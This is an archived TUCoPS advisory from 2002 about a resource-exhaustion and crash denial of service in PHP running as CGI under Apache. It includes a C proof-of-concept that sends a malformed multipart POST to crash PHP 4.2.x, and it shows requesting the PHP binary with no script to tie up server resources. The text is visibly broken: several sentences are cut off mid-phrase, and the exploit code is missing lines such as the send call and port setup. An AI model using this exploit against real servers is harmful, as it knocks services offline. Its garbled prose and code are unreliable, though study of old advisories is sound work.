TUCoPS :: Web :: PHP :: web5547.htm

PHP resource exhaustion Denial of Service
23th Jul 2002 [SBWID-5547]

	PHP resource exhaustion Denial of Service


	PHP for windows rel ?


	Matthew Murphy [http://www.murphy.101main.net] says :

	The PHP interpreter is a heavy-duty CGI EXE (or SAPI  module,  depending
	on configuration) that implements an HTML-embedded  script  language.  A
	vulnerability in PHP can be used to cause a denial of  service  in  some

	PHP's install process on Apache requires a "/php/" alias to be  created,
	as  it  resolves  CGI  paths  to  a  virtual.  (e.g,  /php/php.exe   not

	To solve the obvious security vulnerability posed  by  allowing  PHP  to
	run from the  web,  the  development  team  added  a  cgi.force_redirect
	option that is enabled by default in Apache.

	However, regardless of the force_redirect value, it  is  still  possible
	to load the binary without a script path:

	(e.g, http://localhost/php/php)

	A problem exists in PHP; specifically, it does not terminate when  given
	no command-line arguments. A consistent flow of requests like the  above
	will exhaust all resources for CGI/ASAPI on the server.

	Exploit: http://www.murphy.101main.net/php-apache.c

	Compiles cleanly on WinMe with MSVC 6.0

	 Update (02 August 2002)


	Exploit by bob, bob@dtors.net

	/* DSR-php4.2x.c

	 * The follow is Proof Of Concept code to

	 * to reproduce the segmentation violation

	 * in PHP4.2.0 & PHP4.2.1 with Apache 1.3.26 on

	 * x86 arch. Found by Joseph S. TestaII


	 * Proof Of Concept code by bob@dtors.net

	 * [notice] child pid 10779 exit signal Segmentation fault (11)





	#include <stdio.h>

	#include <string.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <netdb.h>





	int main(int argc, char *argv[]) {

	int sock, i;

	char seg[250];

	struct in_addr addr;

	struct sockaddr_in sin;

	struct hostent *he;



	fprintf(stdout, "\nDSR-php4.2x.c By bob. POC.[www.dtors.net]\n\n"); 



	   fprintf(stderr, "\nUsage : %s <host> <php file>\n\n", argv[0]);





	if ((he=gethostbyname(argv[1])) == NULL)


	   fprintf(stderr, "ERROR: Hostname lookup failed!\n\n");




	sock=socket(AF_INET, SOCK_STREAM, 0);

	bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);




	fprintf(stdout, "Connecting to %s... \n",argv[1]);

	if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)


	     fprintf(stderr, "ERROR: Connection Timed Out!\n");




	else {


	fprintf(stdout, "Sending headers... \n");

	sprintf(seg,"POST /%s HTTP/1.0\nContent-type: multipart/form-data; boundary=---------------------------123\nContent-length: 129\n\n-----------------------------123\nContent-Disposition: filename\n\n\nhttp://www.dtors.net\n-----------------------------123--\n\n",argv[2]);





	fprintf(stdout, "...headers sent! \n\n");

	fprintf(stdout, "Now check your error_log, for apache [child pid] signal(11)\n");







	 Update (24 July 2002)



	Vejeta says :

	This does not apply when the php interpreter is  dynamically  loaded  by
	apache using the DSO interface

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2023 AOH